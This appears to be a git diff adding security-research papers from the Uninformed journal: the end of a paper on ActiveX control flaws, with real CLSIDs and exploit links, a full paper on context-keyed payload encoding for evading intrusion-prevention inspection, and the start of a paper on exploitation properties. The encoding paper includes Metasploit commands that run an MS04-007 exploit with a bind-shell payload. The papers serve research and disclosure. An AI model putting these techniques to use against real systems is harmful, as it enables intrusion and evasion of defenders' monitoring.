Milw0rm in September, the vulnerable control +was still part of the package. + +The control itself has a CLSID of 3BB56637-651D-4D1D-AFA4-C0506F57EAF8. After the +installation of the software, it can be found in the registry in: + +HKEY_CLASSES_ROOT\CLSID\{3BB56637-651D-4D1D-AFA4-C0506F57EAF8} + +The DLL that implements this control can be found on the harddrive in the file +that is specified in the "InprocServer32" key. In this example it is: + +C:\WINDOWS\system32\MW6QRC~1.DLL + +There are two interesting things to note here. For one, the ProgID key has a +default value of MW6QRCode.QRCode.1. At the ProgID's corresponding location in +the registry, namely HKCR\MW6QRCode.QRCode.1, the CLSID subkey contains the +CLSID of that control. This tells us that this control can be instantiated +using both its CLSID and ProgID. Another point of interest in the screenshot +is the absence of the "Implemented Categories" key. This means that this +control is neither part of the "safe for scripting" nor the "safe for +initialization" category. However, it appears that the control must implement +IObjectSafety since it is still possible to instantiate the control from IE. +The following simple HTML code tries to instantiate the control. + + + + + + +The result of this snippet of code is the appearance of a little picture in IE. +As this works just fine without Internet Explorer complaining about being +unable to load the control, the next examination step is in order. + +4.1.1) Enumerating Exported Interfaces + +By now it has been shown that the example control can be instantiated from IE +just fine. The question now is what kind of interfaces the control provides to +the caller. By submitting the specific CLSID of the control that is to be +examined to ComRaider, the tool lists all of the controls implemented +functions as well as the kind and number of expected parameters. An +alternative to ComRaider is the so-called OLE-COM object viewer that comes +with the platform SDK and Visual Studio. + +4.1.2) Exploitation + +After playing around with various functions, it soon becomes obvious that +SaveAsBMP and SaveAsWMF happily accept any path provided to save the +generated graphic in the specified location. This can make it possible to +overwrite existing files with the picture if the user running IE has +sufficient access. This is a perfect example of a program using untrusted +data and operating on it without any kind of checks. It is likely that the +control's author did not consider the security implications of what they were +doing. + +A sample exploit for this vulnerability, written by shinnai, can be found on +Milw0rm: http://www.milw0rm.com/exploits/4420. + +4.2) HP Info Center + +On December 12th, 2007, a vulnerability in an ActiveX control which was +shipped by default with multiple series of Hewlett Packard notebooks was +disclosed. The issue itself was found in a piece of software called the HP +Info Center. The vulnerability allowed remote read and write access to the +registry as well as the execution of arbitrary commands. By instantiating +this control in Internet Explorer and calling the vulnerable functions it was +possible to run software with the same level of access as the user running IE. +Porkythepig found and disclosed this serious threat and wrote a detailed +report as well as a sample exploit covering three attack vectors. + +The HP control with the CLSID 62DDEB79-15B2-41E3-8834-D3B80493887A was +responsible for the listed vulnerabilities. By default it installs itself into +C:\Program Files\Hewlett-Packard\HP Info Center. In his advisory, porky +listed three potentially insecure methods as well as the expected parameters: + + - VARIANT GetRegValue(String sHKey, String sectionName, String keyName); + - void SetRegValue(String sHKey, String sSectionName, String sKeyName, String sValue); + - void LaunchApp(String appPath, String params, int cmdShow); + +While the first and second method allow for remote read and write access to +the registry, the third function runs arbitrary programs. For example, an +attacker could execute cmd.exe with arbitrary arguments. + +In this example the vulnerable control provided remote access to the victims +machine. Sample code to exploit all three functions can once again be found on +Milw0rm: http://www.milw0rm.com/exploits/4720. + +4.3) Vantage Linguistics AnswerWorks + +The third and last example of various ActiveX vulnerabilities is in the +Vantage Linguistics AnswerWorks. Advisories covering this vulnerability were +released in December, 2007. The awApi4.AnswerWorks.1 control exports several +functions which are prone to stack-based buffer overflows. The functions +GetHistory(), GetSeedQuery(), and SetSeedQuery() fail to properly handle long +strings provided by a malicious website. The resulting stack-based buffer +overflow allows for the execution of arbitrary code, as "e.b." demonstrates +with a proof of concept that binds a shell to port 4444 when the exploit +succeeds. + +When the exploit is loaded from a webserver it instatiates the CLSID and links +the created object to a variable named obj. It then calls the GetHistory() +function with a carefully crafted string which consists of 214 A's to fill the +buffer followed by a return address which overwrites the one saved on the +stack. After those 4 bytes come 12 NOPs and then finally the shellcode. As +one can easily see, this exploit is based on the same techniques that can be +seen in many other stack-based exploits. + +The exploit mentioned in this example can also be found on Milw0rm: +http://www.milw0rm.com/exploits/4825. + +5) Summary + +This paper has provided a brief introduction to ActiveX. The focus has been +on discussing some of the underlying technology and security related issues +that can manifest themselves. This was meant to equip the reader with enough +background knowledge to examine ActiveX controls from a security point of +view. The author hopes he managed to describe the big picture in enough detail +to provide readers with enough information on the matter to base further +research on the aquired knowledge. + +5.1) Acknowledgements + +wastedimage - For answering the first questions +deft - For providing lots of answers and examples +rjohnson - For filling in details deft forgot to mention +skape - For background knowledge on underlying functions +hdm - For knowing all the rest + +References + +[1] ActiveX Controls @ Wikipedia + http://en.wikipedia.org/wiki/ActiveXcontrol + +[2] ActiveX Controls + http://msdn2.microsoft.com/en-us/library/aa751968.aspx + +[3] The art of software security assessment + http://taossa.com + +[4] ComRaider + http://labs.idefense.com/software/fuzzing.php#morecomraider + +[5] Axman ActiveX Fuzzer + http://www.metasploit.com/users/hdm/tools/axman/ diff --git a/uninformed/9.3.txt b/uninformed/9.3.txt new file mode 100644 index 0000000..05f16fc --- /dev/null +++ b/uninformed/9.3.txt @@ -0,0 +1,679 @@ +Context-keyed Payload Encoding +Preventing Payload Disclosure via Context +October, 2007 +I)ruid, C²ISSP +druid@caughq.org +http://druid.caughq.org + +Abstract + +A common goal of payload encoders is to evade a third-party detection mechanism which +is actively observing attack traffic somewhere along the route from an attacker +to their target, filtering on commonly used payload instructions. The use of +a payload encoder may be easily detected and blocked as well as opening up the +opportunity for the payload to be decoded for further analysis. Even +so-called keyed encoders utilize easily observable, recoverable, or guessable +key values in their encoding algorithm, thus making decoding on-the-fly +trivial once the encoding algorithm is identified. It is feasible that an +active observer may make use of the inherent functionality of the decoder stub +to decode the payload of a suspected exploit in order to inspect the contents +of that payload and make a control decision about the network traffic. This +paper presents a new method of keying an encoder which is based entirely on +contextual information that is predictable or known about the target by the +attacker and constructible or recoverable by the decoder stub when executed at +the target. An active observer of the attack traffic however should be unable +to decode the payload due to lack of the contextual keying information. + + +1) Introduction + +In the art of vulnerability exploitation there are often numerous hurdles that +one must overcome. Examples of hurdles can be seen as barriers to traversing +the attack vector and challenges with developing an effective vulnerability +exploitation technique. A critical step in the later inevitabley requires the +use of an exploit payload, traditionally referred to as shellcode. A payload +is the functional exploit component that implements the exploit's purpose[1]. + +One barrier to successful exploitation may be that including certain byte +values in the payload will not allow the payload to reach its destination in +an executable form[2], or even at all. Another hurdle to overcome may be that an +in-line network security monitoring device such as an Intrusion Prevention +System (IPS) could be filtering network traffic for the particular payload +that the exploit intends to deliver[3, 288-289], or otherwise extracting the +payload for further automated analysis[4][5, 2]. Whatever the hurdle may be, +many challenges relating to the payload portion of the exploit can be overcome +by employing what is known as a payload encoder. + +1.1) Payload Encoders + +Payload encoders provide the utility of obfuscating the exploit's payload +while it is in transit. Once the payload has reached its target, the payload +is decoded prior to execution on the target system. This allows the +payload to bypass various controls and restrictions of the type mentioned +previously while still remaining in an executable form. In general, an +exploit's payload will be encoded prior to packaging in the exploit itself +and what is known as a decoder stub will be prepended to the +encoded payload which produces a new, slightly larger payload. This new +payload is then packaged within the exploit in favor of the original. + +1.1.1) Encoder + +The encoder can take many forms and provide its function in a number of +different ways. At its most basic definition, an encoder is simply a function +used when packaging a payload for use by an exploit which encodes the payload +into a different form than the original. There are many different encoders +available today, some of which provide encoding such as alphanumeric +mixed-case text[6], Unicode safe mix-cased text[7], UTF-8 and tolower() +safe[2], and XOR against a 4-byte key[8]. There is also an extremely +impressive polymorphic XOR additive feedback encoder available called Shikata +Ga Nai[9]. + +1.1.2) Decoder Stub + +The decoder stub is a small chunk of instructions that is prepended to the +encoded payload. When this new payload is executed on the target system, the +decoder stub executes first and is responsible for decoding the original +payload data. Once the original payload data is decoded, the decoder stub +passes execution to the original payload. Decoder stubs generally perform a +reversal of the encoding function, or in the case of an XOR obfuscation +encoding, simply perform the XOR again against the same key value. + +1.1.3) Example: Metasploit Alpha2 Alphanumeric Mixedcase Encoder (x86) + +The Metasploit Alpha2 Alphanumeric Mixedcase Encoder[6] encodes payloads as +alphanumeric mixedcase text using SkyLined's Alpha2 encoding suite. This +allows a payload encoded with this encoder to traverse such attack vectors as +may require input to pass text validation functions such as the C89 standard +functions isalnum() and isprint(), as well as the C99 standard function +isascii(). + +1.1.4) Keyed Encoders + +Many encoders utilize encoding techniques which require a key value. The +Call+4 Dword XOR encoder[8] and the Shikata Ga Nai polymorphic XOR additive +feedback encoder[9] are examples of keyed encoders. + +Key Selection + +Encoders which make use of key data during their encoding process have +traditionally used either random or static data chosen at the time of +encoding, or data that is tied to the encoding process itself[10], such as the +index value of the current position in the buffer being operated on, or a +value relative to that index. + +Example: Metasploit Single-byte XOR Countdown Encoder (x86) + +The Metasploit Single-byte XOR Countdown Encoder[10] uses the length of the +remaining payload to be operated upon as a position-dependent encoder key. +The benefit that this provides is a smaller decoder stub, as the decoder stub +does not need to contain any static keying information. Instead, it tracks +the length property of the payload as it decodes and uses that information as +the key. + +Weaknesses + +The most significant weakness of most keyed encoders available today is that +the keying information that is used is either observable directly or +constructable from the observed decoder stub. Either the static key +information is transmitted within the exploit as part of the decoder stub +itself, or the key information is reproducible once the encoding algorithm is +known. Knowledge of the encoding algorithm is usually obtainable by +recognizing known decoder stubs or analyzing unknown decoder stubs +instructions in detail. + +The expected inherent functionality of the decoder stub also introduces a +weakness. Modern payload encoders rely upon the decoder stub's ability to +properly decode the payload at run-time. It is feasible that an active +observer may exploit this inherent functionality to decode a suspected payload +within a sandbox environment in real-time[5,3] in order to inspect the contents of +the payload and make a control decision about the network traffic it was found +in. Because the decoder stub requires only that it is being executed by a +processor that will understand its instruction-set, producing such a sandbox +is trivial. + +Unfortunately, all of the aforementioned keyed encoders include the static key +value directly in their decoder stubs and are thus vulnerable to the +weaknesses described here. This allows an observer of the encoded payload in +transit to potentially decode the payload and inspect it's content. +Fortunately, all of the keyed encoders previously mentioned could potentially +be improved to use contextual keying as is described in the following chapter. + +2) Contextual Keying + +Contextual keying is defined as the process of selecting an encoding key from +context information that is either known or predictable about the target. A +context-key is defined as the result of that process. The context information +available about the exploit's target may contain any number of various types +of information, dependent upon the attacker's proximity to the target, +knowledge of the target's operation or internals, or knowledge of the target's +environment. + +2.1) Encoder + +When utilizing a context-key, the method of encoding is largely unchanged from +current methods. The exploit crafter simply passes the encoding function the +context-key as its static key value. The size of the context-key is dependent +upon the requirements of the encoder being used; however, it is feasible that +the key may be of any fixed length, or ideally the same size as the payload +being encoded. + +2.2) Decoder Stub + +The decoder stub that requires a context-key is not only responsible for +decoding the encoded payload but is also responsible for retrieving or +otherwise generating its context-key from the information that is available to +it at run-time. This may include retrieving a value from a known memory +address, performing some calculation on other information available to it, or +any number of other possible scenarios. The following section will explore +some of the possibilities. + +2.3) Application Specific Keys + +2.3.1) Static Application Data + +If the attacker has the convenience of reproducing the operating environment +and execution of the target application, or even simply has access to the +application's executable, a context-key may be chosen from information known +about the address space of the running process. Known locations of static +values such as environment variables, global variables and constants such as +version strings, help text, or error messages, or even the application's +instructions or linked library instructions themselves may be chosen from as +contextual keying information. + +Profiling the Application + +To successfully select a context-key from a running application's memory, the +application's memory must first be profiled. By polling the application's +address space over a period of time, ranges of memory that change can be +eliminated from the potential context-key data pool. The primary requirement +of viable data in the process's memory space is that it does not +change over time or between subsequent instantiations of the running +application. After profiling is complete, the resultant list of memory +addresses and static data will be referred to as the application's +memory map. + +Memory Map Creation + +The basic steps to create a comprehensive memory map of a running process are: + +1. Attach to the running process. +2. Initialize the memory map with a poll of non-null bytes in the running + process's virtual memory. +3. Wait an arbitrary amount of time. +4. Poll the process's virtual memory again. +5. Find the differential between the contents of the memory map and the most + recent memory poll. +6. Eliminate any data that has changed between the two from the memory map. +7. Optionally eliminate any memory ranges shorter than your desired key length. +8. Go to step 3. + +Continue the above process until changing data is no longer being eliminated +and store the resulting memory map as a map of that instance of the target +process. Restart the application and repeat the above process, producing a +second memory map for the second instance of the target process. Compare the +two memory maps for differences and again eliminate any data that differs. +Repeat this process until changing data is no longer being eliminated. + +The resulting final memory map for the process must then be analyzed for +static data that may be directly relative to the environment of the process +and may not be consistent across processes running within different +environments such as on different hosts or in different networks. This type +of data includes network addresses and ports, host names, operating system +"unames", and so forth. This type of data may also include installation +paths, user names, and other user-configurable options during installation of +the application. This type of data does not include application version +strings or other pertinent information which may be directly relative to the +properties of the application which contribute to the application being +vulnerable and successfully exploited. + +Identifying this type of information relative to the application's environment +will produce two distinct types of memory map data; one type containing static +application context data, and the other type containing environment context +data. Both of these types of data can be useful as potential context-key +values, however, the former will be more portable amongst targets whereas the +latter will only be useful when selecting key values for the actual target +process that was actively profiled. If it is undesirable, introducing +instantiation of processes being profiled on different network hosts and with +different installation configuration options to the memory map generation +process outlined above will likely eliminate the latter from the memory map +entirely. + +Finally, the memory maps can be trimmed of any remaining NULL bytes to reduce +their size. The final memory map should consist of records containing memory +addresses and the string of static data which can be found in memory at those +locations. + +Memory Map Creation Methods + + Metasploit Framework's msfpescan + +One method to create a memory map of viable addresses and values is to use a +tool provided by the Metasploit Framework called msfpescan. msfpescan is +designed to scan PE formatted executable files and return the requested +portion of the .text section of the executable. Data found in the .text +section is useful as potential context-key data as the .text section is marked +read-only when mapped into a process' address space and is therefore static +and will not change. Furthermore, msfpescan predicts where in the executed +process' address space these static values will be located, thus providing +both the static data values as well as the addresses at which those values can +be retrieved. + +To illustrate, suppose a memory map for the Windows System service needs to be +created for exploitation of the vulnerability described in Microsoft Security +Bulletin MS06-040[11] by an exploit which will employ a context-keyed payload +encoder. A common DLL that is linked into the service's executable when +compiled can be selected as the target for msfpescan. In this case, +ws2help.dll is chosen due to its lack of updates since August 23rd, 2001. +Because this particular DLL has remained unchanged for over six years, its +instructions provide a particularly consistent cache of potential context-keys +for an exploit targeting an application linked against it anytime during the +last six years. A scan of the first 1024 bytes of ws2help.dll's executable +instructions can be performed by executing the following command: + +msfpescan -b 0x0 -A 1024 ws2help.dll + +Furthermore, msfpescan has been improved via this research effort to render +data directly as a memory map. This improved version is available in the +Metasploit Framework as of version 3.1. A scan and dump to memory map of +ws2help.dll's executable instructions can be performed by executing the +following command: + +msfpescan --context-map context ws2help.dll + +It is important to note that this method of memory map generation is much less +comprehensive than the method previously outlined; however, when targeting a +process whose executable is relatively large and links in a large number of +libraries, profiling only the instruction portions of the executable and +library files involved may provide an adequately-sized memory map for +context-key selection. + + Metasploit Framework's memdump.exe + +The Metasploit Framework also provides another useful tool for the profiling +of a running process' memory called memdump.exe. memdump.exe is used to dump +the entire memory space of a running process. This tool can be used to +provide the polling step of the memory map creation process previously +outlined. By producing multiple memory dumps over a period of time, the dumps +can be compared to isolate static data. + + smem-map + +A tool for profiling a Linux process' address space and creating a memory map +is provided by this research effort. The smem-map tool[12] was created as a +reference implementation of the process outlined at the beginning of this +section. smem-map is a Linux command-line application and relies on the proc +filesystem as an interface to the target process' address space. + +The first time smem-map is used against a target process, it will populate an +initial memory map with all non-null bytes currently found in the process's +virtual memory. Subsequent polls of the memory ranges that were initially +identified will eliminate data that has changed between the memory map and the +most recent poll of the process's memory. If the tool is stopped and +restarted and the specified memory map file exists, the file will be reloaded +as the memory map to be compared against instead of populating an entirely new +memory map. Using this functionality, a memory map can be refined over +multiple sessions of the tool as well as multiple instantiations of the target +process. A scan of a running process' address space can be performed by +executing the following command: + +smem-map output.map + + Context-Key Selection + +Once a memory map has been created for the target application, the encoder may +select any sequential data from any memory address within the memory map which +is both large enough to fill the desired key length and also does not produce +any disallowed byte values in the encoded payload as defined by restrictions +to the attack vector for the vulnerability. The decoder stub should then +retrieve the context-key from the same memory address when executed at the +target. If the decoder stub is developed so that it may read individual bytes +of data from different locations, the encoder may select individual bytes from +multiple addresses in the memory map. The encoder must note the memory +address or addresses at which the context-key is read from the memory map for +inclusion in the decoder stub. + + Proof of Concept: Improved Shikata ga Nai + +The Shikata ga Nai encoder[9], included with the Metasploit Framework, implements +polymorphic XOR additive feedback encoding against a four byte key. The +decoder stub that is prepended to a payload which has been encoded by Shikata +ga Nai is generated based on dynamic instruction substitution and dynamic +block ordering. The registers used by the decoder stub instructions are also +selected dynamically when the decoder stub is constructed. + +Improving the original Metasploit implementation of Shikata ga Nai to use +contextual keying was fairly trivial. Instead of randomly selecting a four +byte key prior to encoding, a key is instead chosen from a supplied memory +map. Furthermore, when generating the decoder stub, the original +implementation used a "mov reg, val" instruction (0xb8) to move the key value +directly from its location in the decoder stub into the register it will use +for the XOR operation. The context-key version instead uses a "mov reg, +[addr]" instruction (0xa1) to retrieve the context-key from the memory +location at [addr] and store it in the same register. The update to the +Shikata ga Nai decoder stub was literally as simple as changing one +instruction, and providing that instruction with the context-key's location +address rather than a static key value directly. + + +The improved version of Shikata ga Nai described here is provided by this +research effort and is available in the Metasploit Framework as of version +3.1. It can be utilized as follows from the Metasploit Framework Console +command-line, after the usual exploit and payload commands: + +set ENCODER x86/shikata_ga_nai +set EnableContextEncoding 1 +set ContextInformationFile +exploit + + Case Study: MS04-007 vs. Windows XP SP0 + +The Metasploit framework currently provides an exploit for the vulnerability +described in Microsoft Security Bulletin MS04-007[13]. The vulnerable application +in this case is the Microsoft ASN.1 Library. + +Before any exploitation using contextual keying can take place, the vulnerable +application must be profiled. By opening the affected library from Windows XP +Service Pack 0 in a debugger, a list of libraries that it itself includes can +be gleaned. By collecting said library DLL files from the target vulnerable +system, or an equivalent system in the lab, msfpescan can then be used to +create a memory map: + +msfpescan --context-map context \ + ms04-007-dlls/* +cat context/* >> ms04-007.map + +After the memory map has been created, it can be provided to Metasploit and +Shikata ga Nai to encode the payload that Metasploit will use to exploit the +vulnerable system: + +use exploit/windows/smb/ms04-007-killbill +set PAYLOAD windows/shell_bind_tcp +set ENCODER x86/shikata_ga_nai +set EnableContextEncoding 1 +set ContextInformationFile ms04-007.map +exploit + +2.3.2) Event Data + +Similar to the static application data approach, transient data may also be +used as a context-key so long as it persists long enough for the decoder stub +to access it. Consider the scenario of a DNS server which is vulnerable to an +overflow when parsing an incoming host name or address look-up request. If +portions of the request are stored in memory prior to the vulnerability being +triggered, the data provided by the request could potentially be used for +contextual keying if it's location is predictable. Values such as IP +addresses, port numbers, packet sequence numbers, and so forth are all +potentially viable for use as a context-key. + +2.3.3) Supplied Data + +Similar to Event Data, an attacker may also be able to supply key data for +later use to the memory space of the target application prior to exploitation. +Consider the scenario of a caching HTTP proxy that exhibits the behavior of +keeping recently requested resources in memory for a period of time prior to +flushing them to disk for longer-term storage. If the attacker is aware of +this behavior, the potential exists for the attacker to cause the proxy to +retrieve a malicious web resource which contains a wealth of usable +context-key data. Even if the attacker cannot predict where in memory the +data may be stored, by having control of the data that is being stored other +exploitation techniques such as egg hunting[14, 9][15] may be used by a +decoder-stub to locate and retrieve context-key information when its exact +location is unknown. + +2.4) Temporal Keys + +The concept of a temporal address was previously introduced by the paper +entitled Temporal Return Addresses: Exploitation Chronomancy[16, 3]. In +summary, a temporal address is a location in memory which holds timer data of +some form. Potential types of timer data stored at a temporal address include +such data as the system date and time, number of seconds since boot, or a +counter of some other form. + +The research presented in the aforementioned paper focused on leveraging the +timer data found at such addresses as the return address used for +vulnerability exploitation. As such, the viability of the data found at the +temporal address was constrained by two properties of the data defined as +scale, and period. These two properties dictate the window of time during +which the data found at the temporal address will equate to the desired +instructions. Another potential constraint for use of a temporal address as +an exploit return address stems from the fact that the value contained at the +temporal address is called directly for use as an executable instruction. If +the memory range it is contained within is marked as non-executable such as +with the more recent versions of Windows[16, 19], attempting use in this manner +will cause an exception. + +For the purpose that temporal addresses will be employed here, such strict +constraints as those previously mentioned do not exist. Rather, the only +desired property of the data stored at the temporal address which will be used +as a context-key is that it does not change, or as in the case of temporal +data, does not change during the time window in which we intend to use it. +Due to this difference in requirements, the actual content of the temporal +address is somewhat irrelevant and therefore is not constrained to a +time-window in either the future or the past during which the data found at +the temporal address will be fit for purpose. The viable time-window in the +case of use for contextual keying is entirely constrained by duration rather +than location along the time-line. Due to the values at different byte +offsets within data found at a temporal address having differing update +frequencies, selection of key data from these values produces varying duration +time-windows during which the values will remain constant. By using single +byte, dual byte, or otherwise relatively short context-keys, and carefully +selecting from the available byte values stored within the timer found at the +temporal address, the viable time-window chosen can be made to be quite +lengthy. + +2.4.1) Context-Key Selection + +Provided by the previously mentioned temporal return address research effort +is a very useful tool called telescope[16, 8]. The tool's function is to analyze a +running process' memory for potential temporal addresses and report them to +the user. By using this tool, potential context-key values and the addresses +at which they reside can be respectively predicted and identified. + +The temporal return addresses paper also revealed a section of memory that is +mapped into all processes running on Windows NT, or any other more recent +Windows system, called SharedUserData[16, 17]. The interesting properties of the +SharedUserData region of a process' address space is that it is always mapped +into memory at a predictable location and is required to be backwards +compatible with previous versions. As such, the individual values contained +within the region will always be at the same offset to it's predictable base +address. One of the values contained within this region of memory is the +system time, which will be used in the examples to follow. + + Remotely Determining Time + +Methods and techniques for profiling a target system's current time is outside +of the scope of this paper, however the aforementioned paper on temporal +return addresses[16, 13-15] offers some insight. Once a target system's +current time has been identified, the values found at various temporal +addresses in memory can be readily predicted to varying degrees of accuracy. + + Time-Window Selection + +It is important to note that when using data stored at a temporal address as a +context-key, parts of that value are likely to be changing frequently. +Fortunately, the key length being used may not require use of the entire timer +value, and as such the values found at the byte offsets that are frequently +changing can likely be ignored. Consider the SystemTime value from the +Windows SharedUserData region of memory. SystemTime is a 100 nanosecond timer +which is measured from January 1st, 1601, is stored as a KSYSTEM_TIME +structure, and is located at memory address 0x7ffe0014 on all versions of +Windows NT[16, 16]: + +0:000> dt _KSYSTEM_TIME + +0x000 LowPart : Uint4B + +0x004 High1Time : Int4B + +0x008 High2Time : Int4B + +Due to this timer's frequent update period, granularity, and scale, some of +the data contained at the temporal address will be too transient for use as a +context-key. The capacity of SystemTime is twelve bytes, however due to the +four bytes labeled as High2Time having an identical value as the four bytes +labeled as High1Time, only the first eight bytes are relevant as a timer. As +shown by the calculations provided by the temporal return addresses paper[16, +10], reproduced below as Figure , it is only worth focusing on values +beginning at byte index four of the SystemTime value, or the four bytes +labeled as High1Time located at address 0x7ffe0018. + ++------+----------------------------------+ +| Byte | Seconds (ext) | ++------+----------------------------------+ +| 0 | 0 (zero) | +| 1 | 0 (zero) | +| 2 | 0 (zero) | +| 3 | 1 (1 sec) | +| 4 | 429 (7 mins 9 secs) | +| 5 | 109951 (1 day 6 hours 32 mins) | +| 6 | 28147497 (325 days 18 hours) | +| 7 | 7205759403 (228 years 179 days) | ++------+----------------------------------+ + +It is also interesting to note that if the payload encoder only utilizes a +single byte context-key, it may not even be required that the attacker +determine the target system's time, as the value at byte index six or seven of +the SystemTime value could be used requiring only that the attacker guess the +system time to within a little less than a year, or to within 228 years, +respectively. + +3) Weaknesses + +Due to the cryptographically weak properties of using functions such as XOR to +obfuscate data, there exist well known attacks against these methods and their +keying information. Although payload encoders which employ XOR as their +obfuscation algorithm have been discussed extensively throughout this paper, +it is not the author's intent to tie the the contextual keying technique +presented here to such algorithms. Rather, contextual keying could just as +readily be used with cryptographically strong encoding algorithms as well. As +such, attacks against the encoding algorithm used, or specifically against the +XOR algorithm, are outside the scope of this paper and will not be detailed +herein. + +4) Conclusion + +While the use of context-keyed payload encoders likely won't prevent a +dedicated forensic analyst from successfully performing an off-line analysis +of an exploit's encoded payload, the system it was targeting, and the target +application in an attempt to discover the key value used, use of the +contextual keying technique will prevent an automated system from decoding the +payload in real-time if it does not have access to, or an automated method of +constructing, an adequate memory map of the target from which to retrieve the +key. + +As systems hardware technology and software capability continue to improve, +network security and monitoring systems will likely begin to join the few +currently existing systems[5, 2-4][4] that attempt to perform this type of real-time +analysis of suspected network exploit traffic, and more specifically, exploit +payloads. + +4.1) Acknowledgments + +The Author would like to thank H.D. Moore and Matt Miller a.k.a. skape for +their assistance in development of the improved Metasploit implementation of +the Shikata ga Nai payload encoder as Proof of Concept as well as the +supporting tools provided by this research effort. + +References + +[1] Ivan Arce. The shellcode generation. IEEE Security & Privacy, + 2(5):72-76, 2004. + +[2] skape. Implementing a custom x86 encoder. Uninformed Journal, 5(3), + September 2006. + +[3] Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, Sinan Eren, Neel + Mehta, Riley Hassell. The Shellcoder's Handhook: Discovering and + Exploiting Security Holes. John Wiley & Sones, 2004. + +[4] Paul Baecher and Markus Koetter. libemu. http://libemu.mwcollect.org/, + 2007. + +[5] R. Smith, A. Prigden, B. Thomason, and V. Shmatikov. Shellshock: Luring + malware into virtual honeypots by emulated response. October 2005. + +[6] SkyLined and Pusscat. Alpha2 alphanumeric mixedcase encoder (x86). + http://framework.metasploit.com/encoders/view/?refname=x86:alpha_mixed. + +[7] SkyLined and Pusscat. Alpha2 alphanumeric unicode mixedcase encoder (x86). + http://framework.metasploit.com/encoders/view/?refname=x86:unicode_mixed. + +[8] H.D. Moore and spoonm. Call+4 dword xor encoder (x86). + http://framework.metasploit.com/encoders/view/?refname=x86:call4_dword_xor. + +[9] spoonm. Polymorphic xor additive feedback encoder (x86). + http://framework.metasploit.com/encoders/view/?refname=x86:shikata_ga_nai. + +[10] vlad902. Single-byte xor countdown encoder (x86). + http://framework.metasploit.com/encoders/view/?refname=x86:countdown. + +[11] Microsoft. Microsoft security bulletin ms06-040. + http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx, August + 2006. + +[12] |)ruid. smem-map - the static memory mapper. + https://sourceforge.net/projects/smem-map. + +[13] Microsoft. Microsoft security bulletin ms04-007. + http://www.microsoft.com/technet/security/bulletin/ms04-007.mspx, + February, 2004. + +[14] The Metasploit Staff. Metasploit 3.0 Developer's Guide. + The Metasploit Project, December 2005. + +[15] skape. Safely searching process virtual address space. + http://hick.org/code/skape/papers/egghunt-shellcode.pdf, September 2004. + +[16] skape. Temporal return addresses. Uninformed Journal, 2(2), September + 2005. + +[17] SweetScape Software. 010 editor. http://www.sweetscape.com/010editor/, + 2002. + +[18] |)ruid. Memorymap.bt. http://druid.caughq.org/src/MemoryMap.bt, 2007. + +Appendix + +A) Memory Map File Specification + +The memory map files created by this research effort's supporting tools adhere +to the file format specification described here. The file format is designed +specifically to be simple, light weight, and versatile. + +A.1) File Format + +An entire memory map file is comprised of individual data records concatenated +together. These individual data records represent a chunk of data found in a +process's memory space. This simple format allows for multiple memory map +files to be further concatenated to produce a single larger memory map file. +Individual data records are comprised of the following elements: + ++----------+------------+--------------+ +| Bit-Size | Byte-Order | Element | ++----------+------------+--------------+ +| 8 | n/a | Data Type | +| 32 | big-endian | Base Address | +| 32 | big-endian | Size | +| Size | n/a | Data | ++----------+------------+--------------+ + +A.2) Data Type Values + +The Data Type values are currently defined in the following table: + ++-------+-------------------+ +| Value | Type | ++-------+-------------------+ +| 0 | Reserved | +| 1 | Static Data | +| 2 | Temporal Data | +| 3 | Environment Data | ++-------+-------------------+ + +A.3) File Parsing + +Parsing of a memory map file is as simple as beginning with the first byte in +the file, reading the first three elements of the data record as they are of +fixed size, then using the last of those three elements as size indicator to +read the final element. If any data remains in the file, there is at least +one more data record to be read. + +To provide for easy parsing and review of memory map files, an 010 Editor +template is provided by this research effort. diff --git a/uninformed/9.4.txt b/uninformed/9.4.txt new file mode 100644 index 0000000..89a0ae7 --- /dev/null +++ b/uninformed/9.4.txt @@ -0,0 +1,875 @@ +Improving Software Security Analysis using Exploitation Properties +12/2007 +skape +mmiller@hick.org + +Abstract + +Reliable exploitation of software vulnerabilities has continued to become more +difficult as formidable mitigations have been established and are now included +by default with most modern operating systems. Future exploitation of +software vulnerabilities will rely on either discovering ways to circumvent +these mitigations or uncovering flaws that are not adequately protected. +Since the majority of the mitigations that exist today lack universal bypass +techniques, it has become more fruitful to take the latter approach. It is in +this vein that this paper introduces the concept of exploitation properties +and describes how they can be used to better understand the exploitability of +a system irrespective of a particular vulnerability. Perceived exploitability +is of utmost importance to both an attacker and to a defender given the +presence of modern mitigations. The ANI vulnerability (MS07-017) is used to +help illustrate these points by acting as a simple example of a vulnerability +that may have been more easily identified as code that should have received +additional scrutiny by taking exploitation properties into consideration. + +1) Introduction + +Modern exploit mitigations have become formidable opponents with respect to +the effect they have on reliable exploitation. Some of the more substantial +modern mitigations include GuardStack (GS), SafeSEH, DEP (NX), ASLR, pointer +encoding, and various heap improvements[8, 9, 10, 15, 24, 3, 4]. The fact +that there have been very few public exploits that have been able to +universally bypass all of these mitigations at once is a testament to the +resilience of these techniques working in concert with one another. It is +obvious that the absence of a given mitigation directly contributes to the +exploitability of the associated code. Likewise, it is also well known that +most mitigations have situations in which they will offer little to no +protection[5, 16, 18, 20, 2, 4]. For instance, in certain cases, it may be +possible to perform a partial overwrite on Windows Vista to defeat ASLR due to +the fact that only 15 bits of most 32-bit addresses may be affected by +randomization[2, 17]. Other mitigations also have situations where they may +not provide adequate coverage. + +Given the fact that the majority of mitigations have known limitations, it +makes sense to consider where this information might be useful. In the field +of program analysis, whether it be manual, static, or dynamic, the question of +scoping is often pertinent. This question typically revolves around figuring +out what areas of code should be reviewed and what precedence, if any, should +be assigned to different regions. Typical approaches taken to accomplish this +often involve identifying code that straddles a trust boundary or performs +complex operations reachable from a trust boundary. However, depending on +one's perspective, this type of approach is insufficient in the face of modern +mitigations because it may result in areas of code being reviewed that are +adequately protected by all mitigations. + +To help address this perceived deficiency, this paper introduces the concept +of exploitation properties and describes how they can be used to provide a +better understanding of exploitability of a system if a vulnerability is found +to be present. Regions of code that are found to have a number of distinct +exploitation properties may be more interesting from an exploitation +standpoint and therefore may warrant additional scrutiny from a program +analysis perspective. The use of exploitation properties may benefit both an +attacker and a defender. For example, companies may wish to perform targeted +reviews on areas of code that may be more trivially exploited in an effort to +prevent reliable exploits from being released in the future. Likewise, an +attacker searching for a vulnerability may wish to avoid auditing regions of +code that are likely to be more difficult to exploit. + +Exploitation properties represent additional criteria that can be used when +attempting to better understand the security aspects of a program. Annotating +regions of code with exploitation properties makes it possible to use set +unions and intersections to identify the subset of interesting regions of code +for a particular analysis problem. For example, an attacker may 